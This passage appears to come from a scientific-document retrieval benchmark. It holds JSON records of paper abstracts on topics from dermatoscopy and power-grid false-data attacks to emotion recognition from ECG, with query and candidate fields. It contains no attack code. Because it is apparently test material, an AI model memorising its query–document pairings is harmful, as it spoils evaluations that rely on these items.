"text": "BACKGROUND\nGenital warts may mimic a variety of conditions, thus complicating their diagnosis and treatment. The recognition of early flat lesions presents a diagnostic challenge.\n\n\nOBJECTIVE\nWe sought to describe the dermatoscopic features of genital warts, unveiling the possibility of their diagnosis by dermatoscopy.\n\n\nMETHODS\nDermatoscopic patterns of 61 genital warts from 48 consecutively enrolled male patients were identified with their frequencies being used as main outcome measures.\n\n\nRESULTS\nThe lesions were examined dermatoscopically and further classified according to their dermatoscopic pattern. The most frequent finding was an unspecific pattern, which was found in 15/61 (24.6%) lesions; a fingerlike pattern was observed in 7 (11.5%), a mosaic pattern in 6 (9.8%), and a knoblike pattern in 3 (4.9%) cases. In almost half of the lesions, pattern combinations were seen, of which a fingerlike/knoblike pattern was the most common, observed in 11/61 (18.0%) cases. Among the vascular features, glomerular, hairpin/dotted, and glomerular/dotted vessels were the most frequent finding seen in 22 (36.0%), 15 (24.6%), and 10 (16.4%) of the 61 cases, respectively. In 10 (16.4%) lesions no vessels were detected. Hairpin vessels were more often seen in fingerlike (χ(2) = 39.31, P = .000) and glomerular/dotted vessels in knoblike/mosaic (χ(2) = 9.97, P = .008) pattern zones; vessels were frequently missing in unspecified (χ(2) = 8.54, P = .014) areas.\n\n\nLIMITATIONS\nOnly male patients were examined.\n\n\nCONCLUSIONS\nThere is a correlation between dermatoscopic patterns and vascular features reflecting the life stages of genital warts; dermatoscopy may be useful in the diagnosis of early-stage lesions.",
"title": ""
},
{
"docid": "4ba941ee9e7840dc18cf873062076456",
"text": "We document methods for the quantitative evaluation of systems that produce a scalar summary of a biometric sample's quality. We are motivated by a need to test claims that quality measures are predictive of matching performance. We regard a quality measurement algorithm as a black box that converts an input sample to an output scalar. We evaluate it by quantifying the association between those values and observed matching results. We advance detection error trade-off and error versus reject characteristics as metrics for the comparative evaluation of sample quality measurement algorithms. We proceed this with a definition of sample quality, a description of the operational use of quality measures. We emphasize the performance goal by including a procedure for annotating the samples of a reference corpus with quality values derived from empirical recognition scores",
"title": ""
},
{
"docid": "5d1182695ad44e581fb58d1521339274",
"text": "This paper presents a new configuration for linear MOS voltage-to-current conversion (transconductance). The proposed circuit combines two previously reported linearization methods [1], [2]. The topology achieves 60-dB linearity for a fully balanced input dynamic range up to 1 at a 3.3-V supply voltage, with slightly decreasing performance in the unbalanced case. The linearity is preserved during the tuning process for a moderate range of transconductance values. The approach is validated by both computer simulations and experiments.",
"title": ""
},
{
"docid": "e5f2a33ef8952e1b8c5129e8aa65045c",
"text": "This paper addresses the problem of learning similarity-preserving binary codes for efficient similarity search in large-scale image collections. We formulate this problem in terms of finding a rotation of zero-centered data so as to minimize the quantization error of mapping this data to the vertices of a zero-centered binary hypercube, and propose a simple and efficient alternating minimization algorithm to accomplish this task. This algorithm, dubbed iterative quantization (ITQ), has connections to multiclass spectral clustering and to the orthogonal Procrustes problem, and it can be used both with unsupervised data embeddings such as PCA and supervised embeddings such as canonical correlation analysis (CCA). The resulting binary codes significantly outperform several other state-of-the-art methods. We also show that further performance improvements can result from transforming the data with a nonlinear kernel mapping prior to PCA or CCA. Finally, we demonstrate an application of ITQ to learning binary attributes or \"classemes\" on the ImageNet data set.",
"title": ""
},
{
"docid": "276e3670984416d145b426f78c529ed8",
"text": "State estimators in power systems are currently used to, for example, detect faulty equipment and to route power flows. It is believed that state estimators will also play an increasingly important role in future smart power grids, as a tool to optimally and more dynamically route power flows. Therefore security of the estimator becomes an important issue. The estimators are currently located in control centers, and large numbers of measurements are sent over unencrypted communication channels to the centers. We here study stealthy false-data attacks against these estimators. We define a security measure tailored to quantify how hard attacks are to perform, and describe an efficient algorithm to compute it. Since there are so many measurement devices in these systems, it is not reasonable to assume that all devices can be made encrypted overnight in the future. Therefore we propose two algorithms to place encrypted devices in the system such as to maximize their utility in terms of increased system security. We illustrate the effectiveness of our algorithms on two IEEE benchmark power networks under two attack and protection cost models.",
"title": ""
},
{
"docid": "d622cf283f27a32b2846a304c0359c5f",
"text": "Reliable verification of image quality of retinal screening images is a prerequisite for the development of automatic screening systems for diabetic retinopathy. A system is presented that can automatically determine whether the quality of a retinal screening image is sufficient for automatic analysis. The system is based on the assumption that an image of sufficient quality should contain particular image structures according to a certain pre-defined distribution. We cluster filterbank response vectors to obtain a compact representation of the image structures found within an image. Using this compact representation together with raw histograms of the R, G, and B color planes, a statistical classifier is trained to distinguish normal from low quality images. The presented system does not require any previous segmentation of the image in contrast with previous work. The system was evaluated on a large, representative set of 1000 images obtained in a screening program. The proposed method, using different feature sets and classifiers, was compared with the ratings of a second human observer. The best system, based on a Support Vector Machine, has performance close to optimal with an area under the ROC curve of 0.9968.",
"title": ""
},
{
"docid": "688fde854293b0902911d967c5e0a906",
"text": "As Internet users increasingly rely on social media sites like Facebook and Twitter to receive news, they are faced with a bewildering number of news media choices. For example, thousands of Facebook pages today are registered and categorized as some form of news media outlets. Inferring the bias (or slant) of these media pages poses a difficult challenge for media watchdog organizations that traditionally rely on con-",
"title": ""
},
{
"docid": "e2d0a4d2c2c38722d9e9493cf506fc1c",
"text": "This paper describes two Global Positioning System (GPS) based attitude determination algorithms which contain steps of integer ambiguity resolution and attitude computation. The first algorithm extends the ambiguity function method to account for the unique requirement of attitude determination. The second algorithm explores the artificial neural network approach to find the attitude. A test platform is set up for verifying these algorithms.",
"title": ""
},
{
"docid": "5da453a1e40f1781804045f64462ea8e",
"text": "Severe aphasia, adult left hemispherectomy, Gilles de la Tourette syndrome (GTS), and other neurological disorders have in common an increased use of swearwords. There are shared linguistic features in common across these language behaviors, as well as important differences. We explore the nature of swearing in normal human communication, and then compare the clinical presentations of selectively preserved, impaired and augmented swearing. These neurolinguistic observations, considered along with related neuroanatomical and neurochemical information, provide the basis for considering the neurobiological foundation of various types of swearing behaviors.",
"title": ""
},
{
"docid": "1d0f73a465399421b86bc6cf470d70dc",
"text": "INTRODUCTION\nThis study was initiated to determine the psychometric properties of the Smart Phone Addiction Scale (SAS) by translating and validating this scale into the Malay language (SAS-M), which is the main language spoken in Malaysia. This study can distinguish smart phone and internet addiction among multi-ethnic Malaysian medical students. In addition, the reliability and validity of the SAS was also demonstrated.\n\n\nMATERIALS AND METHODS\nA total of 228 participants were selected between August 2014 and September 2014 to complete a set of questionnaires, including the SAS and the modified Kimberly Young Internet addiction test (IAT) in the Malay language.\n\n\nRESULTS\nThere were 99 males and 129 females with ages ranging from 19 to 22 years old (21.7±1.1) included in this study. Descriptive and factor analyses, intra-class coefficients, t-tests and correlation analyses were conducted to verify the reliability and validity of the SAS. Bartlett's test of sphericity was significant (p <0.01), and the Kaiser-Mayer-Olkin measure of sampling adequacy for the SAS-M was 0.92, indicating meritoriously that the factor analysis was appropriate. The internal consistency and concurrent validity of the SAS-M were verified (Cronbach's alpha = 0.94). All of the subscales of the SAS-M, except for positive anticipation, were significantly related to the Malay version of the IAT.\n\n\nCONCLUSIONS\nThis study developed the first smart phone addiction scale among medical students. This scale was shown to be reliable and valid in the Malay language.",
"title": ""
},
{
"docid": "20fd36e287a631c82aa8527e6a36931f",
"text": "Creating a mesh is the first step in a wide range of applications, including scientific computing and computer graphics. An unstructured simplex mesh requires a choice of meshpoints (vertex nodes) and a triangulation. We want to offer a short and simple MATLAB code, described in more detail than usual, so the reader can experiment (and add to the code) knowing the underlying principles. We find the node locations by solving for equilibrium in a truss structure (using piecewise linear force-displacement relations) and we reset the topology by the Delaunay algorithm. The geometry is described implicitly by its distance function. In addition to being much shorter and simpler than other meshing techniques, our algorithm typically produces meshes of very high quality. We discuss ways to improve the robustness and the performance, but our aim here is simplicity. Readers can download (and edit) the codes from http://math.mit.edu/~persson/mesh.",
"title": ""
},
{
"docid": "2be8a11750dcce1f412f386ae3834c7c",
"text": "Cloud-based file synchronization services, such as Dropbox, have never been more popular. They provide excellent reliability and durability in their server-side storage, and can provide a consistent view of their synchronized files across multiple clients. However, the loose coupling of these services and the local file system may, in some cases, turn these benefits into drawbacks. In this paper, we show that these services can silently propagate both local data corruption and the results of inconsistent crash recovery, and cannot guarantee that the data they store reflects the actual state of the disk. We propose techniques to prevent and recover from these problems by reducing the separation between local file systems and synchronization clients, providing clients with deeper knowledge of file system activity and allowing the file system to take advantage of the correct data stored remotely.",
"title": ""
},
{
"docid": "c37e48459d24f7802bfb863c731ecff4",
"text": "The need to evaluate a function f (A) ∈ C n×n of a matrix A ∈ C n×n arises in a wide and growing number of applications, ranging from the numerical solution of differential equations to measures of the complexity of networks. We give a survey of numerical methods for evaluating matrix functions, along with a brief treatment of the underlying theory and a description of two recent applications. The survey is organized by classes of methods, which are broadly those based on similarity transformations, those employing approximation by polynomial or rational functions, and matrix iterations. Computation of the Fréchet derivative, which is important for condition number estimation, is also treated, along with the problem of computing f (A)b without computing f (A). A summary of available software completes the survey.",
"title": ""
},
{
"docid": "94f8ebb84705e0d6c7a87bb6515fd710",
"text": "We describe here our approaches and results on the WAT 2017 shared translation tasks. Motivated by the good results we obtained with Neural Machine Translation in the previous shared task, we continued to explore this approach this year, with incremental improvements in models and training methods. We focused on the ASPEC dataset and could improve the stateof-the-art results for Chinese-to-Japanese and Japanese-to-Chinese translations.",
"title": ""
},
{
"docid": "13ec9ea20812dd75b4947b395ef1a595",
"text": "Cameras are a natural fit for micro aerial vehicles (MAVs) due to their low weight, low power consumption, and two-dimensional field of view. However, computationally-intensive algorithms are required to infer the 3D structure of the environment from 2D image data. This requirement is made more difficult with the MAV’s limited payload which only allows for one CPU board. Hence, we have to design efficient algorithms for state estimation, mapping, planning, and exploration. We implement a set of algorithms on two different vision-based MAV systems such that these algorithms enable the MAVs to map and explore unknown environments. By using both self-built and off-the-shelf systems, we show that our algorithms can be used on different platforms. All algorithms necessary for autonomous mapping and exploration run on-board the MAV. Using a front-looking stereo camera as the main sensor, we maintain a tiled octree-based 3D occupancy map. The MAV uses this map for local navigation and frontier-based exploration. In addition, we use a wall-following algorithm as an alternative exploration algorithm in open areas where frontier-based exploration underperforms. During the exploration, data is transmitted to the ground station which runs ∗http://people.inf.ethz.ch/hengli large-scale visual SLAM. We estimate the MAV’s state with inertial data from an IMU together with metric velocity measurements from a custom-built optical flow sensor and pose estimates from visual odometry. We verify our approaches with experimental results, which to the best of our knowledge, demonstrate our MAVs to be the first vision-based MAVs to autonomously explore both indoor and outdoor environments.",
"title": ""
},
{
"docid": "ffd7afcf6e3b836733b80ed681e2a2b9",
"text": "The emergence of cloud management systems, and the adoption of elastic cloud services enable dynamic adjustment of cloud hosted resources and provisioning. In order to effectively provision for dynamic workloads presented on cloud platforms, an accurate forecast of the load on the cloud resources is required. In this paper, we investigate various forecasting methods presented in recent research, identify and adapt evaluation metrics used in literature and compare forecasting methods on prediction performance. We investigate the performance gain of ensemble models when combining three of the best performing models into one model. We find that our 30th order Auto-regression model and Feed-Forward Neural Network method perform the best when evaluated on Google's Cluster dataset and using the provision specific metrics identified. We also show an improvement in forecasting accuracy when evaluating two ensemble models.",
"title": ""
},
{
"docid": "7d3b8f381710cb196ba126f2b1942d57",
"text": "Radar devices can be used in nonintrusive situations to monitor vital sign, through clothes or behind walls. By detecting and extracting body motion linked to physiological activity, accurate simultaneous estimations of both heart rate (HR) and respiration rate (RR) is possible. However, most research to date has focused on front monitoring of superficial motion of the chest. In this paper, body penetration of electromagnetic (EM) wave is investigated to perform back monitoring of human subjects. Using body-coupled antennas and an ultra-wideband (UWB) pulsed radar, in-body monitoring of lungs and heart motion was achieved. An optimised location of measurement in the back of a subject is presented, to enhance signal-to-noise ratio and limit attenuation of reflected radar signals. Phase-based detection techniques are then investigated for back measurements of vital sign, in conjunction with frequency estimation methods that reduce the impact of parasite signals. Finally, an algorithm combining these techniques is presented to allow robust and real-time estimation of both HR and RR. Static and dynamic tests were conducted, and demonstrated the possibility of using this sensor in future health monitoring systems, especially in the form of a smart car seat for driver monitoring.",
"title": ""
}
] | scidocsrr |
2182711b3dabc3f3d810d48f3a45690d | Sudden Deaths : Taking Stock of Geographic Ties | [
{
"docid": "15886d83be78940609c697b30eb73b13",
"text": "Why is corruption—the misuse of public office for private gain— perceived to be more widespread in some countries than others? Different theories associate this with particular historical and cultural traditions, levels of economic development, political institutions, and government policies. This article analyzes several indexes of “perceived corruption” compiled from business risk surveys for the 1980s and 1990s. Six arguments find support. Countries with Protestant traditions, histories of British rule, more developed economies, and (probably) higher imports were less \"corrupt\". Federal states were more \"corrupt\". While the current degree of democracy was not significant, long exposure to democracy predicted lower corruption.",
"title": ""
}
] | [
{
"docid": "e20fd63eac8226c829efefdea5680228",
"text": "Optic disc segmentation in retinal fundus images plays a critical rule in diagnosing a variety of pathologies and abnormalities related to eye retina. Most of the abnormalities that are related to optic disc lead to structural changes in the inner and outer zones of optic disc. Optic disc segmentation on the level of whole retina image degrades the detection sensitivity for these zones. In this paper, we present an automated technique for the Region-Of-Interest segmentation of optic disc region in retinal images. Our segmentation technique reduces the processing area required for optic disc segmentation techniques leading to notable performance enhancement and reducing the amount of the required computational cost for each retinal image. DRIVE, DRISHTI-GS and DiaRetDB1 datasets were used to test and validate our proposed pre-processing technique.",
"title": ""
},
{
"docid": "002aec0b09bbd2d0e3453c9b3aa8d547",
"text": "It is often appealing to assume that existing solutions can be directly applied to emerging engineering domains. Unfortunately, careful investigation of the unique challenges presented by new domains exposes its idiosyncrasies, thus often requiring new approaches and solutions. In this paper, we argue that the “smart” grid, replacing its incredibly successful and reliable predecessor, poses a series of new security challenges, among others, that require novel approaches to the field of cyber security. We will call this new field cyber-physical security. The tight coupling between information and communication technologies and physical systems introduces new security concerns, requiring a rethinking of the commonly used objectives and methods. Existing security approaches are either inapplicable, not viable, insufficiently scalable, incompatible, or simply inadequate to address the challenges posed by highly complex environments such as the smart grid. A concerted effort by the entire industry, the research community, and the policy makers is required to achieve the vision of a secure smart grid infrastructure.",
"title": ""
},
{
"docid": "ff04301675ffa651e9cbdfbb9c6ab75d",
"text": "It is challenging to detect and track the ball from the broadcast soccer video. The feature-based tracking methods to judge if a sole object is a target are inadequate because the features of the balls change fast over frames and we cannot differ the ball from other objects by them. This paper proposes a new framework to find the ball position by creating and analyzing the trajectory. The ball trajectory is obtained from the candidate collection by use of the heuristic false candidate reduction, the Kalman filterbased trajectory mining, and the trajectory evaluation. The ball trajectory is extended via a localized Kalman filter-based model matching procedure. The experimental results on two consecutive 1000-frame sequences illustrate that the proposed framework is very effective and can obtain a very high accuracy that is much better than existing methods.",
"title": ""
},
{
"docid": "9faec965b145160ee7f74b80a6c2d291",
"text": "Several skin substitutes are available that can be used in the management of hand burns; some are intended as temporary covers to expedite healing of shallow burns and others are intended to be used in the surgical management of deep burns. An understanding of skin biology and the relative benefits of each product are needed to determine the optimal role of these products in hand burn management.",
"title": ""
},
{
"docid": "346cd0b680f7da2ff8ab3d97a294086c",
"text": "Inference in Conditional Random Fields and Hidden Markov Models is done using the Viterbi algorithm, an efficient dynamic programming algorithm. In many cases, general (non-local and non-sequential) constraints may exist over the output sequence, but cannot be incorporated and exploited in a natural way by this inference procedure. This paper proposes a novel inference procedure based on integer linear programming (ILP) and extends CRF models to naturally and efficiently support general constraint structures. For sequential constraints, this procedure reduces to simple linear programming as the inference process. Experimental evidence is supplied in the context of an important NLP problem, semantic role labeling.",
"title": ""
},
{
"docid": "15fc6cbc3a5103e8ef51449b0f987b46",
"text": "BACKGROUND\nCognitive reserve (CR) or brain reserve capacity explains why individuals with higher IQ, education, or occupational attainment have lower risks of developing dementia, Alzheimer's disease (AD) or vascular dementia (VaD). The CR hypothesis postulates that CR reduces the prevalence and incidence of AD or VaD. It also hypothesizes that among those who have greater initial cognitive reserve (in contrast to those with less reserve) greater brain pathology occurs before the clinical symptoms of disease becomes manifest. Thus clinical disease onset triggers a faster decline in cognition and function, and increased mortality among those with initial greater cognitive reserve. Disease progression follows distinctly separate pathological and clinical paths. With education as a proxy we use meta-analyses and qualitative analyses to review the evidence for the CR hypothesis.\n\n\nMETHODOLOGY/PRINCIPAL FINDINGS\nWe searched PubMed, PsycoINFO, EMBASE, HealthStar, and Scopus databases from January 1980 to June 2011 for observational studies with clear criteria for dementia, AD or VaD and education. One hundred and thirty-three articles with a variety of study designs met the inclusion criteria. Prevalence and incidence studies with odds ratios (ORs), relative risks or original data were included in the meta-analyses. Other studies were reviewed qualitatively. The studies covered 437,477 subjects. Prevalence and incidence studies with pooled ORs of 2.61 (95%CI 2.21-3.07) and 1.88 (95%CI 1.51-2.34) respectively, showed low education increased the risk of dementia. Heterogeneity and sensitivity tests confirmed the evidence. Generally, study characteristics had no effect on conclusions. Qualitative analyses also showed the protective effects of higher education on developing dementia and with clinical disease onset hastening a decline in cognition and function, and greater brain pathology.\n\n\nCONCLUSION/SIGNIFICANCE\nThis systematic review and meta-analyses covering a wide range of observational studies and diverse settings provides robust support for the CR hypothesis. The CR hypothesis suggests several avenues for dementia prevention.",
"title": ""
},
{
"docid": "87b23719131fc8ab0bd60949be1595e8",
"text": "To understand how implicit and explicit biofeedback work in games, we developed a first-person shooter (FPS) game to experiment with different biofeedback techniques. While this area has seen plenty of discussion, there is little rigorous experimentation addressing how biofeedback can enhance human-computer interaction. In our two-part study, (N=36) subjects first played eight different game stages with two implicit biofeedback conditions, with two simulation-based comparison and repetition rounds, then repeated the two biofeedback stages when given explicit information on the biofeedback. The biofeedback conditions were respiration and skin-conductance (EDA) adaptations. Adaptation targets were four balanced player avatar attributes. We collected data with psycho¬physiological measures (electromyography, respiration, and EDA), a game experience questionnaire, and game-play measures.\n According to our experiment, implicit biofeedback does not produce significant effects in player experience in an FPS game. In the explicit biofeedback conditions, players were more immersed and positively affected, and they were able to manipulate the game play with the biosignal interface. We recommend exploring the possibilities of using explicit biofeedback interaction in commercial games.",
"title": ""
},
{
"docid": "94f23b8710342512c84da0c7ab9492d8",
"text": "Transferring knowledge across a sequence of related tasks is an important challenge in reinforcement learning. Despite much encouraging empirical evidence that shows benefits of transfer, there has been very little theoretical analysis. In this paper, we study a class of lifelong reinforcementlearning problems: the agent solves a sequence of tasks modeled as finite Markov decision processes (MDPs), each of which is from a finite set of MDPs with the same state/action spaces and different transition/reward functions. Inspired by the need for cross-task exploration in lifelong learning, we formulate a novel online discovery problem and give an optimal learning algorithm to solve it. Such results allow us to develop a new lifelong reinforcement-learning algorithm, whose overall sample complexity in a sequence of tasks is much smaller than that of single-task learning, with high probability, even if the sequence of tasks is generated by an adversary. Benefits of the algorithm are demonstrated in a simulated problem.",
"title": ""
},
{
"docid": "21c4cd3a91a659fcd3800967943a2ffd",
"text": "Ground reaction force (GRF) measurement is important in the analysis of human body movements. The main drawback of the existing measurement systems is the restriction to a laboratory environment. This study proposes an ambulatory system for assessing the dynamics of ankle and foot, which integrates the measurement of the GRF with the measurement of human body movement. The GRF and the center of pressure (CoP) are measured using two 6D force/moment sensors mounted beneath the shoe. The movement of the foot and the lower leg is measured using three miniature inertial sensors, two rigidly attached to the shoe and one to the lower leg. The proposed system is validated using a force plate and an optical position measurement system as a reference. The results show good correspondence between both measurement systems, except for the ankle power. The root mean square (rms) difference of the magnitude of the GRF over 10 evaluated trials was 0.012 ± 0.001 N/N (mean ± standard deviation), being 1.1 ± 0.1 % of the maximal GRF magnitude. It should be noted that the forces, moments, and powers are normalized with respect to body weight. The CoP estimation using both methods shows good correspondence, as indicated by the rms difference of 5.1± 0.7 mm, corresponding to 1.7 ± 0.3 % of the length of the shoe. The rms difference between the magnitudes of the heel position estimates was calculated as 18 ± 6 mm, being 1.4 ± 0.5 % of the maximal magnitude. The ankle moment rms difference was 0.004 ± 0.001 Nm/N, being 2.3 ± 0.5 % of the maximal magnitude. Finally, the rms difference of the estimated power at the ankle was 0.02 ± 0.005 W/N, being 14 ± 5 % of the maximal power. This power difference is caused by an inaccurate estimation of the angular velocities using the optical reference measurement system, which is due to considering the foot as a single segment. The ambulatory system considers separate heel and forefoot segments, thus allowing an additional foot moment and power to be estimated. Based on the results of this research, it is concluded that the combination of the instrumented shoe and inertial sensing is a promising tool for the assessment of the dynamics of foot and ankle in an ambulatory setting.",
"title": ""
},
{
"docid": "59084b05271efe4b22dd490958622c1e",
"text": "Millimeter-wave (mmWave) massive multiple-input multiple-output (MIMO) seamlessly integrates two wireless technologies, mmWave communications and massive MIMO, which provides spectrums with tens of GHz of total bandwidth and supports aggressive space division multiple access using large-scale arrays. Though it is a promising solution for next-generation systems, the realization of mmWave massive MIMO faces several practical challenges. In particular, implementing massive MIMO in the digital domain requires hundreds to thousands of radio frequency chains and analog-to-digital converters matching the number of antennas. Furthermore, designing these components to operate at the mmWave frequencies is challenging and costly. These motivated the recent development of the hybrid-beamforming architecture, where MIMO signal processing is divided for separate implementation in the analog and digital domains, called the analog and digital beamforming, respectively. Analog beamforming using a phase array introduces uni-modulus constraints on the beamforming coefficients. They render the conventional MIMO techniques unsuitable and call for new designs. In this paper, we present a systematic design framework for hybrid beamforming for multi-cell multiuser massive MIMO systems over mmWave channels characterized by sparse propagation paths. The framework relies on the decomposition of analog beamforming vectors and path observation vectors into Kronecker products of factors being uni-modulus vectors. Exploiting properties of Kronecker mixed products, different factors of the analog beamformer are designed for either nulling interference paths or coherently combining data paths. Furthermore, a channel estimation scheme is designed for enabling the proposed hybrid beamforming. The scheme estimates the angles-of-arrival (AoA) of data and interference paths by analog beam scanning and data-path gains by analog beam steering. The performance of the channel estimation scheme is analyzed. In particular, the AoA spectrum resulting from beam scanning, which displays the magnitude distribution of paths over the AoA range, is derived in closed form. It is shown that the inter-cell interference level diminishes inversely with the array size, the square root of pilot sequence length, and the spatial separation between paths, suggesting different ways of tackling pilot contamination.",
"title": ""
},
{
"docid": "5c0cbf418975bf435f5b02aaf7e92f3e",
"text": "Client authenticationhasbeena continuoussourceof problemson theWeb. Althoughmany well-studiedtechniquesexist for authentication, Websitescontinueto use extremely weak authenticationschemes,especiallyin non-enterprise nvironmentssuchasstorefronts. These weaknesses oftenresultfrom carelessuseof authenticators within Web cookies. Of the twenty-seven siteswe investigated,we weakenedthe client authenticationon two systems,gainedunauthorizedaccesson eight, and extractedthesecretkey usedto mint authenticatorsfrom one. We provide a descriptionof the limitations, requirements,andsecuritymodelsspecificto Webclientauthentication. This includesthe introductionof the interrogative adversary, a surprisinglypowerful adversarythat canadapti vely querya Website. We proposea setof hintsfor designinga secureclient authenticationscheme.Usingthesehints,wepresenthe designand analysisof a simple authenticationscheme secureagainstforgeriesby the interrogati ve adversary. In conjunctionwith SSL, our schemeis secureagainst forgeriesby theactiveadversary.",
"title": ""
},
{
"docid": "250b5717e5a8bd0677f9ab71123d6390",
"text": "With the advent of robot-assisted surgery, the role of data-driven approaches to integrate statistics and machine learning is growing rapidly with prominent interests in objective surgical skill assessment. However, most existing work requires translating robot motion kinematics into intermediate features or gesture segments that are expensive to extract, lack efficiency, and require significant domain-specific knowledge. We propose an analytical deep learning framework for skill assessment in surgical training. A deep convolutional neural network is implemented to map multivariate time series data of the motion kinematics to individual skill levels. We perform experiments on the public minimally invasive surgical robotic dataset, JHU-ISI Gesture and Skill Assessment Working Set (JIGSAWS). Our proposed learning model achieved competitive accuracies of 92.5%, 95.4%, and 91.3%, in the standard training tasks: Suturing, Needle-passing, and Knot-tying, respectively. Without the need of engineered features or carefully tuned gesture segmentation, our model can successfully decode skill information from raw motion profiles via end-to-end learning. Meanwhile, the proposed model is able to reliably interpret skills within a 1–3 second window, without needing an observation of entire training trial. This study highlights the potential of deep architectures for efficient online skill assessment in modern surgical training.",
"title": ""
},
{
"docid": "f2f5495973c560f15c307680bd5d3843",
"text": "The Bayesian analysis of neural networks is difficult because a simple prior over weights implies a complex prior distribution over functions . In this paper we investigate the use of Gaussian process priors over functions, which permit the predictive Bayesian analysis for fixed values of hyperparameters to be carried out exactly using matrix operations. Two methods, using optimization and averaging (via Hybrid Monte Carlo) over hyperparameters have been tested on a number of challenging problems and have produced excellent results.",
"title": ""
},
{
"docid": "5d9b29c10d878d288a960ae793f2366e",
"text": "We propose a new bandgap reference topology for supply voltages as low as one diode drop (~0.8V). In conventional low-voltage references, supply voltage is limited by the generated reference voltage. Also, the proposed topology generates the reference voltage at the output of the feedback amplifier. This eliminates the need for an additional output buffer, otherwise required in conventional topologies. With the bandgap core biased from the reference voltage, the new topology is also suitable for a low-voltage shunt reference. We fabricated a 1V, 0.35mV/degC reference occupying 0.013mm2 in a 90nm CMOS process",
"title": ""
},
{
"docid": "2da4c992e8e2e9bfdab188bedd47a4d2",
"text": "Hybrid neural networks (hybrid-NNs) have been widely used and brought new challenges to NN processors. Thinker is an energy efficient reconfigurable hybrid-NN processor fabricated in 65-nm technology. To achieve high energy efficiency, three optimization techniques are proposed. First, each processing element (PE) supports bit-width adaptive computing to meet various bit-widths of neural layers, which raises computing throughput by 91% and improves energy efficiency by <inline-formula> <tex-math notation=\"LaTeX\">$1.93 \\times $ </tex-math></inline-formula> on average. Second, PE array supports on-demand array partitioning and reconfiguration for processing different NNs in parallel, which results in 13.7% improvement of PE utilization and improves energy efficiency by <inline-formula> <tex-math notation=\"LaTeX\">$1.11 \\times $ </tex-math></inline-formula>. Third, a fused data pattern-based multi-bank memory system is designed to exploit data reuse and guarantee parallel data access, which improves computing throughput and energy efficiency by <inline-formula> <tex-math notation=\"LaTeX\">$1.11 \\times $ </tex-math></inline-formula> and <inline-formula> <tex-math notation=\"LaTeX\">$1.17 \\times $ </tex-math></inline-formula>, respectively. Measurement results show that this processor achieves 5.09-TOPS/W energy efficiency at most.",
"title": ""
},
{
"docid": "83ac82ef100fdf648a5214a50d163fe3",
"text": "We consider the problem of multi-robot taskallocation when robots have to deal with uncertain utility estimates. Typically an allocation is performed to maximize expected utility; we consider a means for measuring the robustness of a given optimal allocation when robots have some measure of the uncertainty (e.g., a probability distribution, or moments of such distributions). We introduce a new O(n) algorithm, the Interval Hungarian algorithm, that extends the classic KuhnMunkres Hungarian algorithm to compute the maximum interval of deviation (for each entry in the assignment matrix) which will retain the same optimal assignment. This provides an efficient measurement of the tolerance of the allocation to the uncertainties, for both a specific interval and a set of interrelated intervals. We conduct experiments both in simulation and with physical robots to validate the approach and to gain insight into the effect of location uncertainty on allocations for multi-robot multi-target navigation tasks.",
"title": ""
},
{
"docid": "14bfd2773bfb055ae14bfa448ba7383b",
"text": "This paper presents a novel Differential Evolution algorithm for protein folding optimization that is applied to a three-dimensional AB off-lattice model. The proposed algorithm includes two new mechanisms. A local search is used to improve convergence speed and to reduce the runtime complexity of the energy calculation. For this purpose, a local movement is introduced within the local search. The designed evolutionary algorithm has fast convergence speed and, therefore, when it is trapped into the local optimum or a relatively good solution is located, it is hard to locate a better similar solution. The similar solution is different from the good solution in only a few components. A component reinitialization method is designed to mitigate this problem. Both the new mechanisms and the proposed algorithm were analyzed on well-known amino acid sequences that are used frequently in the literature. Experimental results show that the employed new mechanisms improve the efficiency of our algorithm and that the proposed algorithm is superior to other state-of-the-art algorithms. It obtained a hit ratio of 100% for sequences up to 18 monomers, within a budget of 10 solution evaluations. New best-known solutions were obtained for most of the sequences. The existence of the symmetric best-known solutions is also demonstrated in the paper.",
"title": ""
},
{
"docid": "5bf385c6ae80f8a8f9dd22592c2530b4",
"text": "This paper represents a reliable, compact, fast and low cost smart home automation system, based on Arduino (microcontroller) and Android app. Bluetooth chip has been used with Arduino, thus eliminating the use of personal computers (PCs). Various devices such as lights, DC Servomotors have been incorporated in the designed system to demonstrate the feasibility, reliability and quick operation of the proposed smart home system. The entire designed system has been tested and it is seen capable of running successfully and perform the desired operations, such as switching functionalities, position control of Servomotor, speed control of D.C motor and light intensity control (Via Voltage Regulation).",
"title": ""
},
{
"docid": "a2b4eb0cb55ad2fa92fe7ead0edb13ad",
"text": "Modern datasets and models are notoriously difficult to explore and analyze due to their inherent high dimensionality and massive numbers of samples. Existing visualization methods which employ dimensionality reduction to two or three dimensions are often inefficient and/or ineffective for these datasets. This paper introduces T-SNE-CUDA, a GPU-accelerated implementation of t-distributed Symmetric Neighbour Embedding (t-SNE) for visualizing datasets and models. T-SNE-CUDA significantly outperforms current implementations with 50-700x speedups on the CIFAR-10 and MNIST datasets. These speedups enable, for the first time, visualization of the neural network activations on the entire ImageNet dataset - a feat that was previously computationally intractable. We also demonstrate visualization performance in the NLP domain by visualizing the GloVe embedding vectors. From these visualizations, we can draw interesting conclusions about using the L2 metric in these embedding spaces. T-SNE-CUDA is publicly available at https://github.com/CannyLab/tsne-cuda.",
"title": ""
}
] | scidocsrr |
027f089004e622f531456b1bc73223c2 | Classification of emotional states from electrocardiogram signals: a non-linear approach based on hurst | [
{
"docid": "93d8b8afe93d10e54bf4a27ba3b58220",
"text": "Researchers interested in emotion have long struggled with the problem of how to elicit emotional responses in the laboratory. In this article, we summarise five years of work to develop a set of films that reliably elicit each of eight emotional states (amusement, anger, contentment, disgust, fear, neutral, sadness, and surprise). After evaluating over 250 films, we showed selected film clips to an ethnically diverse sample of 494 English-speaking subjects. We then chose the two best films for each of the eight target emotions based on the intensity and discreteness of subjects' responses to each film. We found that our set of 16 films successfully elicited amusement, anger, contentment. disgust, sadness, surprise, a relatively neutral state, and, to a lesser extent, fear. We compare this set of films with another set recently described by Philippot (1993), and indicate that detailed instructions for creating our set of film stimuli will be provided on request.",
"title": ""
}
] | [
{
"docid": "8fd5b3cead78b47e95119ac1a70e44db",
